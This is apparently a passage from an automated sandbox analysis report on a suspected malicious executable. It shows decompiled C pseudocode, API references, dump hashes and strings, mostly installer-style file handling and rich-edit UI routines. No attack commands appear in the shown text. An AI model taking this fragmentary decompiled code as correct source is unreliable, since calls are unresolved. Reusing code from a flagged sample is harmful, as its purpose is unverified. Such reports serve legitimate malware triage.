                                      • GetKeyState.USER32(00000010), ref: 1000A7CC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: State
                                      • String ID: R$Style dump$t
                                      • API String ID: 1649606143-533759046
                                      • Opcode ID: f827f0813b281848d5d5bca29062919adc97ad30a9b75ffcb5b3a89824fe6d4f
                                      • Instruction ID: 5666ef65f986f6e2bf90dc35293eb8e47cce71d865684a2d2a84e307e653b016
                                      • Opcode Fuzzy Hash: f827f0813b281848d5d5bca29062919adc97ad30a9b75ffcb5b3a89824fe6d4f
                                      • Instruction Fuzzy Hash: 10B151B9A04204ABFB10CF50D841BAE37A6EB453C5F10C215F9095F2CAE775EAC0DB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      • Source.c, xrefs: 10001F3F
                                      • ECO_AUTOVSCROLL not implemented yet!, xrefs: 10002015
                                      • ECO_AUTOWORDSELECTION not implemented yet!, xrefs: 10002048
                                      • ECO_VERTICAL not implemented yet!, xrefs: 10001FE3
                                      • ECO_AUTOHSCROLL not implemented yet!, xrefs: 10001FFD
                                      • ECO_WANTRETURN not implemented yet!, xrefs: 10002030
                                      • !editor->selofs, xrefs: 10001F44
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: __wassert
                                      • String ID: !editor->selofs$ECO_AUTOHSCROLL not implemented yet!$ECO_AUTOVSCROLL not implemented yet!$ECO_AUTOWORDSELECTION not implemented yet!$ECO_VERTICAL not implemented yet!$ECO_WANTRETURN not implemented yet!$Source.c
                                      • API String ID: 3993402318-3805334104
                                      • Opcode ID: 8236e087399bd24c6ae1879c86eaab7c61e0b581d961a5abbb5071022da15af2
                                      • Instruction ID: 25c434b80dad87d093fca20cfb5c3a14f7cc8c03316401a9fd2f7aa543138ec9
                                      • Opcode Fuzzy Hash: 8236e087399bd24c6ae1879c86eaab7c61e0b581d961a5abbb5071022da15af2
                                      • Instruction Fuzzy Hash: 845104B5E00608DFEB05CF44D881BDDB7B2FB88380F1481A9E8496B24AC735AA51CF95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00405B89(CHAR* _a4) {
                                      				char _t5;
                                      				char _t7;
                                      				char* _t15;
                                      				char* _t16;
                                      				CHAR* _t17;
                                      
                                      				_t17 = _a4;
                                      				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                      					_t17 =  &(_t17[4]);
                                      				}
                                      				if( *_t17 != 0 && E0040548B(_t17) != 0) {
                                      					_t17 =  &(_t17[2]);
                                      				}
                                      				_t5 =  *_t17;
                                      				_t15 = _t17;
                                      				_t16 = _t17;
                                      				if(_t5 != 0) {
                                      					do {
                                      						if(_t5 > 0x1f &&  *((char*)(E00405449("*?|<>/\":", _t5))) == 0) {
                                      							E004055C3(_t16, _t17, CharNextA(_t17) - _t17);
                                      							_t16 = CharNextA(_t16);
                                      						}
                                      						_t17 = CharNextA(_t17);
                                      						_t5 =  *_t17;
                                      					} while (_t5 != 0);
                                      				}
                                      				 *_t16 =  *_t16 & 0x00000000;
                                      				while(1) {
                                      					_t16 = CharPrevA(_t15, _t16);
                                      					_t7 =  *_t16;
                                      					if(_t7 != 0x20 && _t7 != 0x5c) {
                                      						break;
                                      					}
                                      					 *_t16 =  *_t16 & 0x00000000;
                                      					if(_t15 < _t16) {
                                      						continue;
                                      					}
                                      					break;
                                      				}
                                      				return _t7;
                                      			}









                                      APIs
                                      • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                                      • CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                                      • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                                      • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Char$Next$Prev
                                      • String ID: "C:\Users\user\Desktop\Y1p8VPvyU2.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 589700163-1604923246
                                      • Opcode ID: e0832ec2d912e5d74df0801281a3a7736ede427d3fd94c72d6daa08f5325fd7a
                                      • Instruction ID: c1e19bc38f5928a16c8df4e3184f884ce5b3d56ade5c4132b49213cb44a1c68a
                                      • Opcode Fuzzy Hash: e0832ec2d912e5d74df0801281a3a7736ede427d3fd94c72d6daa08f5325fd7a
                                      • Instruction Fuzzy Hash: 41119351809B912DFB3216244C44B77BFA9CB96760F18447BE9D4622C2C6BCBC829B7D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00403D44(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                      				struct tagLOGBRUSH _v16;
                                      				long _t35;
                                      				long _t37;
                                      				void* _t40;
                                      				long* _t49;
                                      
                                      				if(_a4 + 0xfffffecd > 5) {
                                      					L15:
                                      					return 0;
                                      				}
                                      				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                      				if(_t49 == 0) {
                                      					goto L15;
                                      				}
                                      				_t35 =  *_t49;
                                      				if((_t49[5] & 0x00000002) != 0) {
                                      					_t35 = GetSysColor(_t35);
                                      				}
                                      				if((_t49[5] & 0x00000001) != 0) {
                                      					SetTextColor(_a8, _t35);
                                      				}
                                      				SetBkMode(_a8, _t49[4]);
                                      				_t37 = _t49[1];
                                      				_v16.lbColor = _t37;
                                      				if((_t49[5] & 0x00000008) != 0) {
                                      					_t37 = GetSysColor(_t37);
                                      					_v16.lbColor = _t37;
                                      				}
                                      				if((_t49[5] & 0x00000004) != 0) {
                                      					SetBkColor(_a8, _t37);
                                      				}
                                      				if((_t49[5] & 0x00000010) != 0) {
                                      					_v16.lbStyle = _t49[2];
                                      					_t40 = _t49[3];
                                      					if(_t40 != 0) {
                                      						DeleteObject(_t40);
                                      					}
                                      					_t49[3] = CreateBrushIndirect( &_v16);
                                      				}
                                      				return _t49[3];
                                      			}









                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                      • String ID:
                                      • API String ID: 2320649405-0
                                      • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                      • Instruction ID: ac003594d1dcb8ae4d3b01263828f587cf1b0240a4208d46790e3dc2010cfdd8
                                      • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                      • Instruction Fuzzy Hash: 58218471904744ABC7219F78DD08B9B7FFCAF01715F048A29E895E22E0D739E904CB55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: _strncmp
                                      • String ID: EM_SETTEXTEX - %s, flags %d, cp %d${\rtf${\urtf
                                      • API String ID: 909875538-1967282443
                                      • Opcode ID: d118ce7dd801465789d66151c1ae044977d7f57222a29d1fbe0e0d9024bb3714
                                      • Instruction ID: 6e217fc72af0b8cd334a20cb4685ead0b29b5aa6f5aec4171388954daf843b2c
                                      • Opcode Fuzzy Hash: d118ce7dd801465789d66151c1ae044977d7f57222a29d1fbe0e0d9024bb3714
                                      • Instruction Fuzzy Hash: BFC13BB9D00218ABEB24CF94DC85BDEB7B5EF48384F048198F90D6B245D735AA85CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 16%
                                      			E100072F0(intOrPtr _a4, intOrPtr* _a8, signed int _a12) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				char _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				char _v28;
                                      				signed int _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				char _v44;
                                      				signed int _v48;
                                      				signed int _v52;
                                      				signed int _v160;
                                      				signed int _v164;
                                      				char _v168;
                                      				intOrPtr* _t91;
                                      				signed int _t95;
                                      				intOrPtr _t112;
                                      				signed int _t115;
                                      				char* _t116;
                                      				intOrPtr _t124;
                                      				void* _t160;
                                      				void* _t165;
                                      
                                      				_v32 = 0;
                                      				_t91 = _a8;
                                      				_v44 =  *_t91;
                                      				_t4 = _t91 + 4; // 0x75000c7d
                                      				_v40 =  *_t4;
                                      				_t6 = _t91 + 8; // 0x84d8b0c
                                      				_v36 =  *_t6;
                                      				if( *((intOrPtr*)(_a4 + 0x4d0)) != 0) {
                                      					do {
                                      						_t95 = E1000C3B0(_a4,  &_v44, _a12,  &_v28,  &_v16);
                                      						_t160 = _t160 + 0x14;
                                      						__eflags = _t95;
                                      						if(__eflags == 0) {
                                      							_a12 = 0;
                                      						} else {
                                      							0x10000000( &_v28);
                                      							_v52 = _t95;
                                      							0x10000000( &_v16);
                                      							_v48 = _t95;
                                      							_t115 = E1000C640(__eflags, _a4,  &_v28, _v48 - _v52);
                                      							_t165 = _t160 + 0x14;
                                      							__eflags = _t115;
                                      							if(_t115 == 0) {
                                      								_v28 = _v16;
                                      								_v24 = _v12;
                                      								_v20 = _v8;
                                      							}
                                      							_t116 =  &_v44;
                                      							0x10000000(_t116);
                                      							_t160 = _t165 + 4;
                                      							_a12 = _a12 - _v48 - _t116;
                                      						}
                                      						__eflags = _v40 - _v24;
                                      						if(_v40 != _v24) {
                                      							L9:
                                      							_v168 = 0x74;
                                      							0x10000000(_a4,  &_v44,  &_v28,  &_v168);
                                      							_t160 = _t160 + 0x10;
                                      							__eflags = _v164 & 0x00000020;
                                      							if((_v164 & 0x00000020) == 0) {
                                      								L11:
                                      								E1000FD30( &_v168, 0, 0x74);
                                      								_v168 = 0x74;
                                      								_v164 = 0x20;
                                      								_v160 = 0;
                                      								0x10000000(_a4,  &_v44,  &_v28,  &_v168);
                                      								_t160 = _t160 + 0x1c;
                                      								while(1) {
                                      									_t124 = _v12;
                                      									__eflags = _v8 -  *((intOrPtr*)(_t124 + 0xc));
                                      									if(_v8 <  *((intOrPtr*)(_t124 + 0xc))) {
                                      										break;
                                      									}
                                      									_t112 = _v12;
                                      									_v8 = _v8 -  *((intOrPtr*)(_t112 + 0xc));
                                      									0x10000000(_v12);
                                      									_t160 = _t160 + 4;
                                      									_v12 = _t112;
                                      								}
                                      								_v32 = 1;
                                      								goto L15;
                                      							}
                                      							__eflags = _v160 & 0x00000020;
                                      							if((_v160 & 0x00000020) == 0) {
                                      								goto L15;
                                      							}
                                      							goto L11;
                                      						} else {
                                      							__eflags = _v36 - _v20;
                                      							if(_v36 == _v20) {
                                      								L15:
                                      								__eflags = _v24 - _v12;
                                      								if(_v24 != _v12) {
                                      									L17:
                                      									_v168 = 0x74;
                                      									0x10000000(_a4,  &_v28,  &_v16,  &_v168);
                                      									_t160 = _t160 + 0x10;
                                      									__eflags = _v164 & 0x00000020;
                                      									if((_v164 & 0x00000020) == 0) {
                                      										L19:
                                      										E1000FD30( &_v168, 0, 0x74);
                                      										_v168 = 0x74;
                                      										_v164 = 0x20;
                                      										_v160 = 0x20;
                                      										_t78 =  &_v168; // 0x74
                                      										0x10000000(_a4,  &_v28,  &_v16, _t78);
                                      										_t160 = _t160 + 0x1c;
                                      										_v32 = 1;
                                      										goto L20;
                                      									}
                                      									__eflags = _v160 & 0x00000020;
                                      									if((_v160 & 0x00000020) != 0) {
                                      										goto L20;
                                      									}
                                      									goto L19;
                                      								}
                                      								__eflags = _v20 - _v8;
                                      								if(_v20 == _v8) {
                                      									goto L20;
                                      								}
                                      								goto L17;
                                      							}
                                      							goto L9;
                                      						}
                                      						L20:
                                      						_v44 = _v16;
                                      						_v40 = _v12;
                                      						_v36 = _v8;
                                      						__eflags = _a12;
                                      					} while (_a12 > 0);
                                      					return _v32;
                                      				}
                                      				return 0;
                                      			}



























                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: _memset
                                      • String ID: $ $t $t
                                      • API String ID: 2102423945-1483231515
                                      • Opcode ID: f3db133e1126fcfa0f1330f280e9068875718495b2b3a16e6fe1df792b02d39f
                                      • Instruction ID: 6be47794a57fd556550f226a9bac114a88676b330a8f33a2bd414b845d7033b0
                                      • Opcode Fuzzy Hash: f3db133e1126fcfa0f1330f280e9068875718495b2b3a16e6fe1df792b02d39f
                                      • Instruction Fuzzy Hash: 0E71FFBAD002089FDB04CF94D881BDEBBB5FF48344F148599E609AB245D774AB44CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 45%
                                      			E1000B110(struct HWND__** _a4) {
                                      				signed int _v8;
                                      				intOrPtr _v12;
                                      				char _v16;
                                      				intOrPtr _v20;
                                      				char _v24;
                                      				char _v28;
                                      				struct tagPOINT _v36;
                                      				intOrPtr _v44;
                                      				char _v48;
                                      				struct tagSCROLLBARINFO _v108;
                                      				intOrPtr _t74;
                                      				void* _t133;
                                      
                                      				_v8 = GetMessagePos();
                                      				_v36.x = _v8 & 0x0000ffff;
                                      				_v36.y = _v8 >> 0x00000010 & 0x0000ffff;
                                      				if( *_a4 == 0) {
                                      					L7:
                                      					if(_a4[0x13a] != 2 || _a4[0x14d] == 0) {
                                      						if(_a4[4] != 0) {
                                      							L14:
                                      							_t37 =  &(_a4[0x12a]); // 0x4d8b0000
                                      							if(_v36.y <  *_t37) {
                                      								L16:
                                      								return 1;
                                      							}
                                      							_t40 =  &(_a4[0x12c]); // 0x52000005
                                      							if(_v36.y <=  *_t40) {
                                      								_t43 =  &(_a4[0x129]); // 0xffff6822
                                      								if(_v36.x >=  *_t43) {
                                      									_t102 = _a4;
                                      									0x10000000(_a4, _v36.x, _v36.y,  &_v48,  &_v16);
                                      									if(_v16 == 0) {
                                      										L26:
                                      										return 1;
                                      									}
                                      									_v20 = _v44;
                                      									_t74 = E1000B0D0(_t102, _v20);
                                      									if(_t74 == 0) {
                                      										0x10000000(_a4);
                                      										if(_t74 == 0) {
                                      											goto L26;
                                      										}
                                      										0x10000000( &_v48);
                                      										_v12 = _t74;
                                      										0x10000000(_a4,  &_v24,  &_v28);
                                      										if(_v24 > _v12 || _v28 < _v12) {
                                      											goto L26;
                                      										} else {
                                      											return 1;
                                      										}
                                      									}
                                      									return 1;
                                      								}
                                      								return 1;
                                      							}
                                      							goto L16;
                                      						}
                                      						_t31 =  &(_a4[0x12a]); // 0x4d8b0000
                                      						if(_v36.y >=  *_t31) {
                                      							goto L14;
                                      						}
                                      						_t34 =  &(_a4[0x129]); // 0xffff6822
                                      						if(_v36.x >=  *_t34) {
                                      							goto L14;
                                      						}
                                      						return 1;
                                      					} else {
                                      						return 1;
                                      					}
                                      				}
                                      				_v108.cbSize = 0x3c;
                                      				GetScrollBarInfo( *_a4, 0xfffffffa,  &_v108);
                                      				if(( *(_t133 + 0xffffffffffffffbc) & 0x00018000) != 0) {
                                      					L4:
                                      					_v108.cbSize = 0x3c;
                                      					GetScrollBarInfo( *_a4, 0xfffffffb,  &_v108);
                                      					if(( *(_t133 + 0xffffffffffffffbc) & 0x00018000) != 0) {
                                      						goto L7;
                                      					}
                                      					_push(_v36.y);
                                      					if(PtInRect( &(_v108.rcScrollBar), _v36.x) == 0) {
                                      						goto L7;
                                      					}
                                      					return 1;
                                      				}
                                      				_push(_v36.y);
                                      				if(PtInRect( &(_v108.rcScrollBar), _v36) == 0) {
                                      					goto L4;
                                      				}
                                      				return 1;
                                      			}
















                                      APIs
                                      • GetMessagePos.USER32 ref: 1000B116
                                      • GetScrollBarInfo.USER32(10003B12,000000FA,0000003C), ref: 1000B15E
                                      • PtInRect.USER32(?,?,?), ref: 1000B184
                                      • GetScrollBarInfo.USER32(?,000000FB,0000003C), ref: 1000B1AB
                                      • PtInRect.USER32(?,?,?), ref: 1000B1D1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: InfoRectScroll$Message
                                      • String ID: <
                                      • API String ID: 2115282619-4251816714
                                      • Opcode ID: c2d36557bdc43d638ffdbab899f66ce28fd8f04d300532c106877b32d261546b
                                      • Instruction ID: c5bb3885e0c12925b60db98093d06c38ccd21f66041d28b64b4a6c893137f00f
                                      • Opcode Fuzzy Hash: c2d36557bdc43d638ffdbab899f66ce28fd8f04d300532c106877b32d261546b
                                      • Instruction Fuzzy Hash: E25133B5A00509DFEB04CF94C891BEE77B5FF48394F608168E9159B289D735EA81CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 16%
                                      			E10002B23() {
                                      				intOrPtr _t25;
                                      				void* _t32;
                                      				void* _t35;
                                      				void* _t54;
                                      				void* _t56;
                                      				void* _t59;
                                      				void* _t69;
                                      
                                      				_t25 =  *((intOrPtr*)(_t54 + 8));
                                      				0x10000000(_t25, _t54 - 0x2c4);
                                      				0x10000000( *((intOrPtr*)(_t54 + 8)), 0);
                                      				0x10000000( *((intOrPtr*)(_t54 + 8)), _t54 - 0x2c4, _t25);
                                      				_t59 = _t56 + 0x1c;
                                      				if( *((intOrPtr*)(_t54 + 0x14)) == 0) {
                                      					0x10000000("WM_SETTEXT - NULL\n");
                                      				} else {
                                      					0x10000000("WM_SETTEXT lParam==%lx\n",  *((intOrPtr*)(_t54 + 0x14)));
                                      					_t32 = E1000D770( *((intOrPtr*)(_t54 + 0x14)), "{\\rtf", 5);
                                      					_t69 = _t59 + 0x14;
                                      					if(_t32 == 0) {
                                      						L3:
                                      						E10008E50( *((intOrPtr*)(_t54 + 8)), 0,  *((intOrPtr*)(_t54 + 0x14)));
                                      					} else {
                                      						_t35 = E1000D770( *((intOrPtr*)(_t54 + 0x14)), "{\\urtf", 6);
                                      						_t69 = _t69 + 0xc;
                                      						if(_t35 != 0) {
                                      							E1000B820( *((intOrPtr*)(_t54 + 8)),  *((intOrPtr*)(_t54 + 0x14)),  *((intOrPtr*)(_t54 + 0x18)));
                                      						} else {
                                      							goto L3;
                                      						}
                                      					}
                                      				}
                                      				0x10000000( *((intOrPtr*)(_t54 + 8)), _t54 - 0x2c4);
                                      				E100072F0( *((intOrPtr*)(_t54 + 8)), _t54 - 0x2c4, 0x7fffffff);
                                      				0x10000000( *((intOrPtr*)(_t54 + 8)), 0, 0);
                                      				 *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x58)) = 0;
                                      				0x10000000( *((intOrPtr*)(_t54 + 8)));
                                      				0x10000000( *((intOrPtr*)(_t54 + 8)));
                                      				0x10000000( *((intOrPtr*)(_t54 + 8)), 0);
                                      				return 1;
                                      			}











                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: _strncmp
                                      • String ID: WM_SETTEXT - NULL$WM_SETTEXT lParam==%lx${\rtf${\urtf
                                      • API String ID: 909875538-1399149447
                                      • Opcode ID: c7d85a95bf14aa92e9469dade82ba589ee1669f8c7f3cc33b3f456d1b268c6ae
                                      • Instruction ID: b35da799011eca8f7549aa62ffda524a41c5db23983b350d5bf49e9afa470f29
                                      • Opcode Fuzzy Hash: c7d85a95bf14aa92e9469dade82ba589ee1669f8c7f3cc33b3f456d1b268c6ae
                                      • Instruction Fuzzy Hash: CD315EFA90020477EB10EE60EC42F9F3369DB58285F008514FE085B28AF671FA548BE2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 86%
                                      			E0040266E(struct _OVERLAPPED* __ebx) {
                                      				void* _t27;
                                      				long _t32;
                                      				struct _OVERLAPPED* _t47;
                                      				void* _t51;
                                      				void* _t53;
                                      				void* _t56;
                                      				void* _t57;
                                      				void* _t58;
                                      
                                      				_t47 = __ebx;
                                      				 *(_t58 - 8) = 0xfffffd66;
                                      				_t52 = E004029E8(0xfffffff0);
                                      				 *(_t58 - 0x44) = _t24;
                                      				if(E0040548B(_t52) == 0) {
                                      					E004029E8(0xffffffed);
                                      				}
                                      				E004055E3(_t52);
                                      				_t27 = E00405602(_t52, 0x40000000, 2);
                                      				 *(_t58 + 8) = _t27;
                                      				if(_t27 != 0xffffffff) {
                                      					_t32 =  *0x42eb74; // 0x8200
                                      					 *(_t58 - 0x2c) = _t32;
                                      					_t51 = GlobalAlloc(0x40, _t32);
                                      					if(_t51 != _t47) {
                                      						E00403098(_t47);
                                      						E00403066(_t51,  *(_t58 - 0x2c));
                                      						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
                                      						 *(_t58 - 0x30) = _t56;
                                      						if(_t56 != _t47) {
                                      							E00402E44( *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
                                      							while( *_t56 != _t47) {
                                      								_t49 =  *_t56;
                                      								_t57 = _t56 + 8;
                                      								 *(_t58 - 0x38) =  *_t56;
                                      								E004055C3( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                                      								_t56 = _t57 +  *(_t58 - 0x38);
                                      							}
                                      							GlobalFree( *(_t58 - 0x30));
                                      						}
                                      						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
                                      						GlobalFree(_t51);
                                      						 *(_t58 - 8) = E00402E44(0xffffffff,  *(_t58 + 8), _t47, _t47);
                                      					}
                                      					CloseHandle( *(_t58 + 8));
                                      				}
                                      				_t53 = 0xfffffff3;
                                      				if( *(_t58 - 8) < _t47) {
                                      					_t53 = 0xffffffef;
                                      					DeleteFileA( *(_t58 - 0x44));
                                      					 *((intOrPtr*)(_t58 - 4)) = 1;
                                      				}
                                      				_push(_t53);
                                      				E00401423();
                                      				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t58 - 4));
                                      				return 0;
                                      			}

                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,00008200,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                                      • GlobalFree.KERNEL32 ref: 00402717
                                      • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
                                      • GlobalFree.KERNEL32 ref: 00402730
                                      • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
                                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                      • String ID:
                                      • API String ID: 3294113728-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00404CC9(CHAR* _a4, CHAR* _a8) {
                                      				struct HWND__* _v8;
                                      				signed int _v12;
                                      				CHAR* _v32;
                                      				long _v44;
                                      				int _v48;
                                      				void* _v52;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				CHAR* _t26;
                                      				signed int _t27;
                                      				CHAR* _t28;
                                      				long _t29;
                                      				signed int _t39;
                                      
                                      				_t26 =  *0x42e344; // 0x0
                                      				_v8 = _t26;
                                      				if(_t26 != 0) {
                                      					_t27 =  *0x42ec14; // 0x0
                                      					_v12 = _t27;
                                      					_t39 = _t27 & 0x00000001;
                                      					if(_t39 == 0) {
                                      						E0040594D(0, _t39, 0x4297b0, 0x4297b0, _a4);
                                      					}
                                      					_t26 = lstrlenA(0x4297b0);
                                      					_a4 = _t26;
                                      					if(_a8 == 0) {
                                      						L6:
                                      						if((_v12 & 0x00000004) == 0) {
                                      							_t26 = SetWindowTextA( *0x42e328, 0x4297b0);
                                      						}
                                      						if((_v12 & 0x00000002) == 0) {
                                      							_v32 = 0x4297b0;
                                      							_v52 = 1;
                                      							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                      							_v44 = 0;
                                      							_v48 = _t29 - _t39;
